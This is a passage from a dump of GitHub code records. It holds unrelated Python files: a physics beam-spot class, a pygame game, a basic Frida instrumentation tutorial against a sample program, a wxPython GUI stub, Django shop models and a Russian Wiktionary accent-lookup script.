XShift(self,beam):\n return beam.x-self.x,math.sqrt(beam.xErr*beam.xErr+self.xErr*self.xErr)\n\n #return y-shift and the associated error\n def YShift(self,beam):\n return beam.y-self.y,math.sqrt(beam.yErr*beam.yErr+self.yErr*self.yErr)\n\n #multiple scattering: additional width increase\n def xMSWidth(self,beam):\n res = 0\n if beam.xwidth>self.xwidth: res = math.sqrt(beam.xwidth*beam.xwidth-self.xwidth*self.xwidth)\n else: res = math.sqrt(-beam.xwidth*beam.xwidth+self.xwidth*self.xwidth)\n error = math.sqrt(beam.xwidthErr*beam.xwidthErr+self.xwidthErr*self.xwidthErr)\n return res,error\n \n #multiple scattering: additional width increase\n def yMSWidth(self,beam):\n res = 0\n if beam.ywidth>self.ywidth: res = math.sqrt(beam.ywidth*beam.ywidth-self.ywidth*self.ywidth)\n else: res = math.sqrt(self.ywidth*self.ywidth-beam.ywidth*beam.ywidth)\n error = math.sqrt(beam.ywidthErr*beam.ywidthErr+self.ywidthErr*self.ywidthErr)\n return res, error\n\n def GetStr(self,withErr=False):\n output = \"Center ( %0.1f\"%self.x\n if withErr: output+=\" +/- %0.1f\"%self.xErr\n output+=\" , %0.1f\"%self.y\n if withErr: output+=\" +/- %0.1f\"%self.yErr\n output+=\" )\"\n output+=\" Widths ( %0.1f\"%self.xwidth\n if withErr: output+=\" +/- %0.1f\"%self.xwidthErr\n output+=\" , %0.1f\"%self.ywidth\n if withErr: output+=\" +/- %0.1f\"%self.ywidthErr\n output+=\" )\"\n return output\n\n def GetCSVHead(self):\n output = \"x,xErr,y,yErr,xwidth,xwidthErr,ywidth,ywidthErr\"\n return output\n\n def GetCSV(self):\n output = \"%0.1f\"%self.x\n output+=\",%0.1f\"%self.xErr\n output+=\",%0.1f\"%self.y\n output+=\",%0.1f\"%self.yErr\n output+=\",%0.1f\"%self.xwidth\n output+=\",%0.1f\"%self.xwidthErr\n output+=\",%0.1f\"%self.ywidth\n output+=\",%0.1f\"%self.ywidthErr\n return output\n\n def LoadCSV(self, info):\n if len(info.split(','))<8:\n return None\n values = info.split(',')\n self.x = float(values[0])\n self.xErr = float(values[1])\n self.y = float(values[2])\n self.yErr = float(values[3])\n self.xwidth = float(values[4])\n self.ywidthErr = float(values[5])\n self.ywidth = float(values[6])\n self.xwidthErr = float(values[7])\n\n def Print(self,withErr=False):\n print(GetStr(withErr))\n\n def GetEllipseCenter(self,color=1,width=1,linestyle=1,fillstyle=0):\n el = TEllipse(self.x,self.y,self.xErr,self.yErr)\n el.SetLineColor(color)\n el.SetFillColor(color)\n el.SetLineWidth(width)\n el.SetLineStyle(linestyle)\n el.SetFillStyle(fillstyle)\n return el\n\n\n","repo_name":"echabert/pySitrineoAna","sub_path":"base/BeamSpot.py","file_name":"BeamSpot.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17595003180","text":"import pygame, sys, classes, random\n\ndef process(player, FPS, total_frames):\n\n\t#processing\n\tfor event in pygame.event.get(): #This is a list of all possible that can happen within the pygame framework. Loops through them\n\t\tif event.type == pygame.QUIT:#if the type of event is that the program wants to quit,\n\t\t\t\n\t\t\tpygame.quit()#closes pygame\n\t\t\tsys.exit()#system closes properly and allows the program to terminate\n\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_e:\n\t\t\t\tclasses.PlayerProjectile.freeze = not classes.PlayerProjectile.freeze\n\n\n\tkeys = pygame.key.get_pressed()\n\n\t#Sets the a and d keys to move the image a moves left\n\t#d moves the image right when w is pressed it goes up and when \n\t#x is pressed the image moves down\n\tif keys[pygame.K_d]:\n\t\tclasses.Player.going_right = True\n\t\tplayer.image = pygame.image.load(\"images/player1.png\")\n\t\tplayer.velx = 5\n\n\telif keys[pygame.K_a]:\n\t\tclasses.Player.going_right = False\n\t\tplayer.image = pygame.image.load(\"images/player1flip.png\")\n\t\tplayer.velx = -5\n\telse:\n\t\tplayer.velx = 0\t\n\n\tif keys[pygame.K_w]:\n\t\tplayer.vely = -5\n\n\telif keys[pygame.K_x]:\n\t\tplayer.vely = 5\n\n\telse:\n\t\tplayer.vely = 0\n\n\t\n\n\n\tif keys[pygame.K_SPACE]:\n\n\n\t\tdef direction():\n\t\t\tif classes.Player.going_right:\n\t\t\t\tp.velx = 8\n\t\t\telse:\n\t\t\t\tp.image = pygame.transform.flip(p.image, True, False)#flips the image when shooting the other direction\n\t\t\t\tp.velx = -8\n\t\tif (classes.PlayerProjectile.freeze):\n\t\t\tp = classes.PlayerProjectile(player.rect.x, player.rect.y, True, \"images/projectiles/snowball1.png\")\n\t\t\tdirection()\n\t\telse:\n\t\t\tp = classes.PlayerProjectile(player.rect.x, player.rect.y, False, \"images/projectiles/snowballFace.png\")\n\t\t\tdirection()\n\n\t\n\t#classes.Enemies(640 - 40, 130, 26, 40, \"images/enemie1flip.png\")\n\tspawn(FPS, total_frames) #calls the enemie so it spawns a new one according to the time.\n\tcollisions()\n\n\t#Creates enemies \ndef spawn(FPS, total_frames):\n\n\tsixty_seconds = FPS * 15 #spaws a new enemy every sixty seconds\n\n\tif total_frames % sixty_seconds == 0:\n\n\t\n\t\tr = random.randint(1,2)\n\t\tx = 1\n\t\tif r == 2:\n\t\t\tx = 640 - 40\n\t\tclasses.Enemies(x, 130, \"images/enemie1.png\")\n\ndef collisions():\n\n\t#Freeze enemies\n\t#widthpx projectiles\n\n\n\t#pygame.sprite.groupcollide(G1, G2, dokill, dokill) # this takes the first group(G1) and second group(G2) and when they collide it asks if you want to remove the first one (dokill) and do you want to remove the second one (dokill). \n\t# for enemies in classes.Enemies.List:\n\t# # \tenemies_proj = pygame.sprite.spritecollide(enemies, classes.PlayerProjectile.List, True)\t\n\t# # \tif len(enemies_proj) > 0:\n\t# # \t\tfor hit in enemies_proj:\n\t# # \t\t\tenemies.health -= enemies.half_health\n\n\t# \tif pygame.sprite.spritecollide(enemies, classes.PlayerProjectile.List, False):\n\n\t# \t\tif classes.PlayerProjectile.freeze:\n\t# \t\t\tenemies.health -= enemies.half_health\n\t# \t\telse:\n\t# \t\t\tenemies.velx = 0\n\t# \t\t\t# enemies.image = \"some image\" put something here if I find a good frozen pic for the enemie\n\n\t# for proj in classes.PlayerProjectile.List:\n\n\t# \tif pygame.sprite.spritecollide(proj, classes.Enemies.List, False):\n\n\t# \t\tproj.rect.x = 2 * -proj.rect.width\n\t# \t\tproj.destroy()\n\n\tfor enemies in classes.Enemies.List:\n\n\t\tprojectiles = pygame.sprite.spritecollide(enemies, classes.PlayerProjectile.List, True) # when a player projectile collides with a enemy it returns the projectiles in the projectiles list\n\n\t\tfor projectile in projectiles:\n\n\n\t\t\tenemies.health = 0\n\t\t\n\t\t\tif projectile.if_this_variable_is_true_then_freeze:\n\n\t\t\t\tenemies.image = image = pygame.image.load(\"images/snowman2.png\") # regular snowball\n\n\t\t\telse:\n\n\t\t\t\tif enemies.velx > 0: # is dead\n\t\t\t\t\tenemies.velx = 0 # enemies is now paralysed\n\t\t\t\t\tenemies.image = pygame.image.load(\"images/snowman3.png\") # freeze snowball\n\t\t\t\telif enemies.velx < 0:\n\t\t\t\t\tenemies.image = pygame.image.load(\"images/snowman3.png\")\n\t\t\t\t\tenemies.image = pygame.transform.flip(enemies.image, True, False)\n\n\t\t\tprojectile.rect.x = 2 * -projectile.rect.width\n\t\t\tprojectile.destroy()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Pettythug/ForThisClass","sub_path":"ClassProjectGame/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18642357368","text":"# Archive of Reversing.ID\r\n# Frida Compendium - Windows Basic\r\n#\r\n# Send and receive data to and from instrumented process.\r\n# Blocking operation.\r\n#\r\n# Run: python blocking-recv.py
    \r\n#s\r\nimport frida\r\nimport sys\r\n\r\n# Use this script to inject following JS file to target\r\n\r\n# Target: count.exe\r\n# - blocking-recv.js\r\n\r\nTARGET_APP = \"count32.exe\"\r\nscript = None\r\n\r\n\r\ndef on_message(message, data):\r\n print(message)\r\n val = int(message['payload'])\r\n script.post( { 'type':'input', 'payload':str(val * 2) } )\r\n\r\n\r\ndef load_script(script_name):\r\n with open(script_name) as f:\r\n script = f.read() \r\n return script \r\n\r\n\r\ndef main():\r\n # Refuse to run if argument is not 3\r\n if len(sys.argv) < 2:\r\n print(\"Usage: python script.py
    \")\r\n sys.exit(0)\r\n\r\n # Parse the arguments\r\n addr = int(sys.argv[1], 16) # Address is in hex form\r\n\r\n # Attach on running process\r\n session = frida.attach(TARGET_APP)\r\n\r\n # Instrumentation script \r\n # Using Interceptor to attach to a function\r\n # Here we are inside a function\r\n global script\r\n jscode = load_script(\"blocking-recv.js\")\r\n script = session.create_script(jscode % (addr))\r\n\r\n # Set a callback, when frida is sending a string, we print it out\r\n script.on('message', on_message)\r\n\r\n # Load the script\r\n script.load()\r\n\r\n script.post( { 'magic' : 135 } )\r\n script.post( { 'magic' : 135 } )\r\n\r\n # Delay\r\n # Execution is happened on other process so we need to make our script \r\n # running all the way to the end\r\n input(\"[!] Press at any time to detach from instrumented program.\\n\\n\")\r\n session.detach()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n ","repo_name":"ReversingID/Frida-Compendium","sub_path":"Learn/Basics/windows/3.communication/3.blocking-recv.py","file_name":"3.blocking-recv.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"30741512003","text":"#!/usr/bin/python\n\nimport wx\nimport datetime\nimport collections\nimport string\nimport logging\nfrom utilities.symbols import Symbols\n\nfrom database import db_connection\n\nclass MainApplicationWindow(wx.Frame):\n\tdef __init__(self, parent = None, title=\"Stock Analysis User Interface\"):\n\t\twx.Frame.__init__(self, parent, title = title, size=(1200,800))\n\t\t\n\t\tself.symbols = Symbols()\n\t\tself.symbols.initialise()\n\t\t\n\n\t\t# Status bar at the bottom\n\t\tself.CreateStatusBar()\n\t\t#Memn\n\t\tmenubar = wx.MenuBar()\n\t\tfile_menu = wx.Menu()\n\t\tfile_menu.Append(22, '&Quit', 'Exit Stock GUI')\n\t\tmenubar.Append(file_menu, '&File')\n\t\tself.SetMenuBar(menubar)\n\t\twx.EVT_MENU(self, 22, self.OnClose)\n\n\t\t#Panels\n\t\tmenu_panel = wx.Panel(self, -1)\n\t\t#Sizer\n\t\t#sizer = wx.GridSizer(8,1)\n\t\tv_menu_box_sizer = wx.BoxSizer(wx.VERTICAL)\n\t\th_menu_box_sizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\t#Create element\n\t\tsymbol_label = wx.StaticText(menu_panel, -1, \"Symbols\", size=(140,20),style=wx.ALIGN_RIGHT)\n\t\tsymbols = wx.ComboBox(menu_panel, -1, size=(140,20),choices = self.symbols.get_symbols_list(), style=wx.CB_READONLY)\n\t\t#Add element\n\t\tv_menu_box_sizer.Add(symbol_label)\n\t\tv_menu_box_sizer.Add(symbols)\n\n\t\th_menu_box_sizer.Add(v_menu_box_sizer, 1, wx.EXPAND)\n\t\t#Add panels\n\t\tmenu_panel.SetSizer(h_menu_box_sizer)\n\t\t#Show Everything (last action)\n\t\tself.Show()\n\t\tpass #__init__ functions\n\n\tdef __del__(self):\n\t\tself.symbols.shutdown()\n\n\tdef OnClose(self, event):\n\t\tself.Close()\n","repo_name":"losowski/trading","sub_path":"pythonOLD/gui/main_application.py","file_name":"main_application.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16402450776","text":"from typing import Iterable, Optional\nfrom django.db import models\nfrom django.utils.text import slugify\nfrom authentication.models import CustomUser\n\nclass BaseModel(models.Model):\n created = models.DateField(auto_now_add=True)\n updated = models.DateField(auto_now=True)\n\n class Meta:\n abstract = True\n\nclass Catigory(models.Model):\n title = models.CharField(max_length=255)\n slug = models.SlugField(max_length=255, blank=True, null=True)\n \n def save(self, *args, **kwargs) -> None:\n if not self.slug:\n self.slug = slugify(self.title)\n super(Catigory, self).save(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.title \n\nclass Product(models.Model):\n title = models.CharField(max_length=255)\n slug = models.SlugField(max_length=255, blank=True)\n description = models.TextField(null=True)\n quantity = models.PositiveBigIntegerField(default=0)\n category = models.ForeignKey(to=Catigory, on_delete=models.CASCADE, related_name=\"products\")\n image = models.ImageField(upload_to=\"products/%Y/%m/%d/\", null=True, blank=True)\n price = models.DecimalField(max_digits=12, decimal_places=2)\n\n created = models.DateField(auto_now_add=True)\n updated = models.DateField(auto_now=True)\n\n def save(self, *args, **kwargs) -> None:\n if not self.slug:\n self.slug = slugify(self.title)\n super(Product, self).save(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.title + \" Catigory_id - \" + str(self.category)\n \n\nclass Order(BaseModel):\n NEW = 'new'\n CONFIRMED = 'confirmed'\n CANCELED = 'canceled'\n\n ORDER_STATUS = (\n (NEW, 'New'),\n (CONFIRMED, 'Confirmed'),\n (CANCELED, 'Canceled')\n )\n\n user = models.ForeignKey(CustomUser, on_delete=models.CASCADE, related_name='orders')\n total_price = models.DecimalField(decimal_places=2, max_digits=12)\n status = models.CharField(choices=ORDER_STATUS, default=NEW, max_length=50)\n paid = models.BooleanField(default=False)\n\nclass OrderProduct(BaseModel):\n order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name=\"products\")\n product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name=\"order_products\")\n quantity = models.PositiveBigIntegerField()\n\n def update_quantity(self):\n self.product.quantity -= self.quantity\n self.product.save()\n\n def save(self, *args, **kwargs) -> None:\n if not self.pk:\n self.update_quantity() \n super(OrderProduct, self).save( *args, **kwargs)","repo_name":"SultanO12/Django-Website","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3371972499","text":"#!/usr/bin/env python\n#coding: utf-8\n\n# find_russian_need_vowels.py is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# Despite its name, this is actually a script to auto-accent Russian text\n# by looking up unaccented multisyllabic words in the dictionary and fetching\n# the accented headwords, and if there's only one, using it in place of the\n# original unaccented word. We're somewhat smarter than this, e.g. we first\n# try looking up the whole phrase before partitioning it into individual\n# words.\n#\n# FIXME:\n#\n# 1. (DONE AS PART OF SMARTER WORD SPLITTING) Handle '''FOO''', matched up\n# against blank tr, TR or '''TR'''. Cf. '''спасти''' in 23865 спасти.\n# 2. (DONE) Handle multiword expressions *inside* of find_accented so we\n# can handle e.g. the multiword linked expressions in 24195 стан, such\n# as [[нотный стан]] and [[передвижной полевой стан]].\n# 3. (DONE) Handle single-word two-part links [[FOO|BAR]].\n# 4. Consider implementing support for [[FOO BAR]] [[BAZ]]. To do this\n# we need to keep [[FOO BAR]] together when word-splitting. We can\n# do this by splitting on the expression we want to keep together,\n# with a capturing split, something like \"(\\[\\[.*?\\]\\]|[^ ,.!?\\-]+)\".\n# It's tricky to handle treating ''' as punctuation when doing this,\n# and even trickier if there is manual translit; probably in the latter\n# case we just want to refuse to do it.\n# 5. (DONE) When splitting on spaces, don't split on hyphens at first, but\n# then split on hyphens the second time around.\n# 6. (DONE) Implement a cache in find_accented_2().\n# 7. (DONE, NO, ACCENTED TEXT CAN'T BE PUT INTO WIKIPEDIA PAGE LINKS)\n# Should probably skip {{wikipedia|lang=ru|...}} links. First check\n# whether accented text can even be put into the page link.\n# 8. (DONE) Skip {{temp|head}}.\n# 9. (DONE) Don't try to accent multisyllable particles that should be\n# accentless (либо, нибудь, надо, обо, ото, перед, передо, подо, предо,\n# через).\n# 10. (DONE) Message \"changed from ... in more than just accents\": Handle\n# grave accent on е and и, handle case where accented text ends with extra\n# ! or ?.\n# 11. (DONE) Turn off splitting of templates on translit with comma in it.\n# 12. (DONE) When doing word splitting and looking up individual words,\n# if the lookup result has a comma in translit, chop off everything\n# after the comma and issue a warning. Occurs e.g. in 6661 детектив,\n# with {{l|ru|частный детектив}}. (FIXME: Even better would be to\n# duplicate the entire translit.)\n# 13. (DONE) When fetching the result of ru-noun+, if there are multiple\n# lemmas, combine the ones with the same Russian by separating the translits\n# with a comma. Occurs e.g. in 6810 динамика with {{l|ru|термодинамика}}.\n# 14. If we repeat this script, we should handle words that occur directly\n# after a stressed monosyllabic preposition and not auto-acent them.\n# The list of such prepositions is без, близ, во, да, до, за, из, ко,\n# меж, на, над, не, ни, об, от, по, под, пред, при, про, со, у. I don't\n# think multisyllabic unstressed prepositions can steal accent from a\n# following word; need to ask Anatoli/Wikitiki89 about this.\n\nimport re, codecs\n\nimport blib, pywikibot\nfrom blib import msg, getparam, addparam\nimport rulib as ru\n\nsite = pywikibot.Site()\nsemi_verbose = False # Set by --semi-verbose or --verbose\n\n# List of accentless multisyllabic words. FIXME: We include было because of\n# the expression не́ было, but we should maybe check for this expression\n# rather than never accenting было.\naccentless_multisyllable = [u\"либо\", u\"нибудь\", u\"надо\", u\"обо\", u\"ото\",\n u\"перед\", u\"передо\", u\"подо\", u\"предо\", u\"через\", u\"было\"]\n\nru_head_templates = [\"ru-noun\", \"ru-proper noun\", \"ru-verb\", \"ru-adj\", \"ru-adv\",\n \"ru-phrase\", \"ru-noun form\"]\n\n# List of heads found during lookup of a page. Value is None if the page\n# doesn't exist. Value is the string \"redirect\" if page is a redirect.\n# Otherwise, value is a tuple (HEADS, SAW_HEAD) where HEADS is all heads\n# found on the page, and SAW_HEAD is True if we saw any headword templates\n# on the page (we might have found headword templates but no heads, e.g.\n# in a template call like {{ru-phrase}}).\naccented_cache = {}\nnum_cache_lookups = 0\nnum_cache_hits = 0\nglobal_disable_cache = False\n\ndef output_stats(pagemsg):\n if global_disable_cache:\n return\n pagemsg(\"Cache size = %s\" % len(accented_cache))\n pagemsg(\"Cache lookups = %s, hits = %s, %0.2f%% hit rate\" % (\n num_cache_lookups, num_cache_hits,\n float(num_cache_hits)*100/num_cache_lookups if num_cache_lookups else 0.0))\n\ndef split_ru_tr(form):\n if \"//\" in form:\n rutr = re.split(\"//\", form)\n assert len(rutr) == 2\n ru, tr = rutr\n return (ru, tr)\n else:\n return (form, \"\")\n\n# Look up a single term (which may be multi-word); if the page exists,\n# retrieve the headword(s), and if there's only one, return its\n# (presumably accented) text and any manual translit; otherwise, return\n# the term and translit passed in.\ndef find_accented_2(term, termtr, verbose, pagemsg):\n if term in accentless_multisyllable:\n pagemsg(\"Not accenting unaccented multisyllabic particle %s\" % term)\n return term, termtr\n # This can happen if e.g. we're passed \"[[FOO|BAR]] BAZ\"; we will reject it,\n # but it will then be word-split and handled correctly (\"[[FOO|BAR]]\" is\n # special-cased in find_accented_1()).\n if \"|\" in term:\n #pagemsg(\"Can't handle links with vertical bars: %s\" % term)\n return term, termtr\n # This can happen if e.g. we're passed \"[[FOO]] [[BAR]]\"; we will reject it,\n # but it will then be word-split and handled correctly (\"[[FOO]]\" is\n # special-cased in find_accented_1()).\n if \"[\" in term or \"]\" in term:\n #pagemsg(\"Can't handle stray bracket in %s\" % term)\n return term, termtr\n if \"<\" in term or \">\" in term:\n pagemsg(\"Can't handle stray < or >: %s\" % term)\n return term, termtr\n if u\"\\u0301\" in term or u\"ё\" in term:\n pagemsg(u\"Term has accent or ё, not looking up accents: %s\" % term)\n return term, termtr\n if ru.is_monosyllabic(term):\n pagemsg(\"Term is monosyllabic, not looking up accents: %s\" % term)\n return term, termtr\n pagename = ru.remove_accents(term)\n # We can't use expand_text() from find_accented_1() because it has a\n # different value for PAGENAME, and the proper value is important in\n # expanding ru-noun+ and ru-proper noun+.\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagename, pagemsg, semi_verbose)\n\n # Look up the page\n if semi_verbose:\n pagemsg(\"find_accented: Finding heads on page %s\" % pagename)\n\n cached_redirect = False\n global num_cache_lookups\n num_cache_lookups += 1\n if pagename in accented_cache:\n global num_cache_hits\n num_cache_hits += 1\n result = accented_cache[pagename]\n cached = True\n if result is None:\n if semi_verbose:\n pagemsg(\"find_accented: Page %s doesn't exist (cached)\" % pagename)\n return term, termtr\n elif result == \"redirect\":\n cached_redirect = True\n heads = set()\n saw_head = False\n else:\n heads, saw_head = result\n else:\n cached = False\n page = pywikibot.Page(site, pagename)\n try:\n if not page.exists():\n if semi_verbose:\n pagemsg(\"find_accented: Page %s doesn't exist\" % pagename)\n if not global_disable_cache:\n accented_cache[pagename] = None\n return term, termtr\n except Exception as e:\n pagemsg(\"WARNING: Error checking page existence: %s\" % unicode(e))\n if not global_disable_cache:\n accented_cache[pagename] = None\n return term, termtr\n\n # Page exists, find the heads\n heads = set()\n def add(val, tr):\n val_to_add = blib.remove_links(val)\n if val_to_add:\n heads.add((val_to_add, tr))\n saw_head = False\n for t in blib.parse(page).filter_templates():\n tname = unicode(t.name)\n if tname in ru_head_templates:\n saw_head = True\n if getparam(t, \"1\"):\n add(getparam(t, \"1\"), getparam(t, \"tr\"))\n elif getparam(t, \"head\"):\n add(getparam(t, \"head\"), getparam(t, \"tr\"))\n elif tname == \"head\" and getparam(t, \"1\") == \"ru\":\n saw_head = True\n add(getparam(t, \"head\"), getparam(t, \"tr\"))\n elif tname in [\"ru-noun+\", \"ru-proper noun+\"]:\n saw_head = True\n lemma = ru.fetch_noun_lemma(t, expand_text)\n lemmas = re.split(\",\", lemma)\n lemmas = [split_ru_tr(lemma) for lemma in lemmas]\n # Group lemmas by Russian, to group multiple translits\n lemmas = ru.group_translits(lemmas, pagemsg, expand_text)\n for val, tr in lemmas:\n add(val, tr)\n if saw_head:\n for i in xrange(2, 10):\n headn = getparam(t, \"head\" + str(i))\n if headn:\n add(headn, getparam(t, \"tr\" + str(i)))\n if not global_disable_cache:\n accented_cache[pagename] = (heads, saw_head)\n\n # We have the heads\n cached_msg = \" (cached)\" if cached else \"\"\n if len(heads) == 0:\n if not saw_head:\n if cached_redirect:\n pagemsg(\"Redirect without heads (cached)\")\n elif not cached and re.match(\"#redirect\", page.text, re.I):\n if not global_disable_cache:\n accented_cache[pagename] = \"redirect\"\n pagemsg(\"Redirect without heads\")\n else:\n pagemsg(\"WARNING: Can't find any heads: %s%s\" % (pagename, cached_msg))\n return term, termtr\n if len(heads) > 1:\n pagemsg(\"WARNING: Found multiple heads for %s%s: %s\" % (pagename, cached_msg, \",\".join(\"%s%s\" % (ru, \"//%s\" % tr if tr else \"\") for ru, tr in heads)))\n return term, termtr\n newterm, newtr = list(heads)[0]\n if semi_verbose:\n pagemsg(\"find_accented: Found head %s%s%s\" % (newterm, \"//%s\" % newtr if newtr else \"\", cached_msg))\n if re.search(\"[!?]$\", newterm) and not re.search(\"[!?]$\", term):\n newterm_wo_punc = re.sub(\"[!?]$\", \"\", newterm)\n if ru.remove_accents(newterm_wo_punc) == ru.remove_accents(term):\n pagemsg(\"Removing punctuation from %s when matching against %s\" % (\n newterm, term))\n newterm = newterm_wo_punc\n if ru.remove_accents(newterm) != ru.remove_accents(term):\n pagemsg(\"WARNING: Accented term %s differs from %s in more than just accents%s\" % (\n newterm, term, cached_msg))\n return newterm, newtr\n\n# After the words in TERM with translit TERMTR have been split into words\n# WORDS and TRWORDS (which should be an empty list if TERMTR is empty), with\n# alternating separators in the odd-numbered words, find accents for each\n# individual word and then rejoin the result.\ndef find_accented_split_words(term, termtr, words, trwords, verbose, pagemsg,\n expand_text, origt):\n newterm = term\n newtr = termtr\n # Check for \"unbalanced\" brackets. Can happen if the text is e.g.\n # [[торго́вец]] [[произведение искусства|произведе́ниями иску́сства]]\n # with multiple words inside a bracket -- not really unbalanced\n # but tricky to handle properly.\n unbalanced = False\n for i in xrange(0, len(words), 2):\n word = words[i]\n if word.count(\"[\") != word.count(\"]\"):\n pagemsg(\"WARNING: Unbalanced brackets in word #%s %s: %s\" %\n (i//2, word, \"\".join(words)))\n unbalanced = True\n break\n if not unbalanced:\n newwords = []\n newtrwords = []\n # If we end up with any words with manual translit (either because\n # translit was already supplied by the existing template and we\n # preserve the translit for a given word, or because we encounter\n # manual translit when looking up a word), we will need to manually\n # transliterate all remaining words. Note, even when the existing\n # template supplies manual translit, we may need to manually\n # translit some words, because the lookup of those words may\n # (in fact, usually will) return a result without manual translit.\n sawtr = False\n # Go through each word and separator.\n for i in xrange(len(words)):\n word = words[i]\n trword = trwords[i] if trwords else \"\"\n if i % 2 == 0:\n # If it's a word (not a separator), look it up.\n ru, tr = find_accented(word, trword, verbose, pagemsg, expand_text,\n origt)\n if tr and \",\" in tr:\n chopped_tr = re.sub(\",.*\", \"\", tr)\n pagemsg(\"WARNING: Comma in translit <%s>, chopping off text after the comma to <%s>\" % (\n tr, chopped_tr))\n tr = chopped_tr\n newwords.append(ru)\n newtrwords.append(tr)\n # If we saw a manual translit word, note it (see above).\n if tr:\n sawtr = True\n else:\n # Else, a separator. Just copy the separator. If it has\n # translit, copy that as well, else copy the separator\n # directly as the translit (all the separator tokens should\n # pass through translit unchanged). Only flag the need for\n # manual translit expansion if there's an existing manual\n # translit of the separator that's different from the\n # separator itself, i.e. different from what auto-translit\n # would produce. (FIXME: It's arguably an error if the\n # manual translit of a separator is different from the\n # separator itself. We output a warning but maybe we should\n # override the manual translit entirely.)\n newwords.append(word)\n newtrwords.append(trword or word)\n if trword and word != trword:\n pagemsg(\"WARNING: Separator <%s> at index %s has manual translit <%s> that's different from it: %s\" % (\n word, i, trword, origt))\n sawtr = True\n if sawtr:\n newertrwords = []\n got_error = False\n for ru, tr in zip(newwords, newtrwords):\n if tr:\n pass\n elif not ru:\n tr = \"\"\n else:\n tr = expand_text(\"{{xlit|ru|%s}}\" % ru)\n if not tr:\n got_error = True\n pagemsg(\"WARNING: Got error during transliteration\")\n break\n newertrwords.append(tr)\n if not got_error:\n newterm = \"\".join(newwords)\n newtr = \"\".join(newertrwords)\n else:\n newterm = \"\".join(newwords)\n newtr = \"\"\n return newterm, newtr\n\n# Look up a term (and associated manual translit) and try to add accents.\n# The basic algorithm is that we first look up the whole term and then\n# split on words and recursively look up each word individually.\n# We are currently able to handle some bracketed expressions but not all:\n#\n# (1) If we're passed in [[FOO]] or [[FOO BAR]], we handle it as a special\n# case by recursively looking up the text inside the link.\n# (2) If we're passed in [[FOO|BAR]] or [[FOO BAR|BAZ BAT]], we handle it as\n# another special case by recursively looking up the text on the right\n# side of the vertical bar.\n# (3) If we're passed in [[FOO]] [[BAR]], [[FOO]] [[BAR|BAZ]] or\n# [[FOO|BAR]] [[BAZ|BAT]], special cases (1) and (2) won't apply. We then\n# will reject it (i.e. leave it unchanged) during the first lookup but\n# then succeed during the recursive (word-split) version, because we\n# will recursively be able to handle the individual parts by cases\n# (1) and (2).\n# (4) If we're passed in [[FOO BAR]] [[BAZ]], or any other expression with\n# a space inside of a link that isn't the entire term, we can't currently\n# handle it. Word splitting will leave unbalanced \"words\" [[FOO and BAR]],\n# which we will trigger a rejection of the whole expression (i.e. it will\n# be left unchanged).\ndef find_accented_1(term, termtr, verbose, pagemsg, expand_text, origt):\n # We can handle plain [[FOO]] or [[FOO BAR]]\n m = re.search(r\"^\\[\\[([^\\[\\]\\|]*)\\]\\]$\", term)\n if m:\n newterm, newtr = find_accented(m.group(1), termtr, verbose, pagemsg, expand_text, origt)\n return \"[[\" + newterm + \"]]\", newtr\n # We can handle [[FOO|BAR]] or [[FOO BAR|BAZ BAT]]\n m = re.search(r\"^\\[\\[([^\\[\\]\\|]*)\\|([^\\[\\]\\|]*)\\]\\]$\", term)\n if m:\n newterm, newtr = find_accented(m.group(2), termtr, verbose, pagemsg, expand_text, origt)\n return \"[[\" + m.group(1) + \"|\" + newterm + \"]]\", newtr\n\n newterm, newtr = find_accented_2(term, termtr, verbose, pagemsg)\n if newterm == term and newtr == termtr:\n words = re.split(r\"((?:[ ,.?!]|''+)+)\", term)\n trwords = re.split(r\"((?:[ ,.?!]|''+)+)\", termtr) if termtr else []\n if trwords and len(words) != len(trwords):\n pagemsg(\"WARNING: %s Cyrillic words but different number %s translit words: %s//%s\" % (len(words), len(trwords), term, termtr))\n elif len(words) == 1:\n if term.startswith(\"-\") or term.endswith(\"-\"):\n # Don't separate a prefix or suffix into component parts; might\n # not be the same word.\n pass\n else:\n # Only one word, and we already looked it up; don't duplicate work.\n # But split on hyphens the second time around.\n words = re.split(r\"(-)\", term)\n trwords = re.split(r\"(-)\", termtr) if termtr else []\n if trwords and len(words) != len(trwords):\n pagemsg(\"WARNING: %s Cyrillic words but different number %s translit words: %s//%s\" % (len(words), len(trwords), term, termtr))\n pass\n elif len(words) == 1:\n # Only one word, and we already looked it up; don't duplicate work\n # or get stuck in infinite loop.\n pass\n else:\n newterm, newtr = find_accented_split_words(term, termtr, words,\n trwords, verbose, pagemsg, expand_text, origt)\n else:\n newterm, newtr = find_accented_split_words(term, termtr, words, 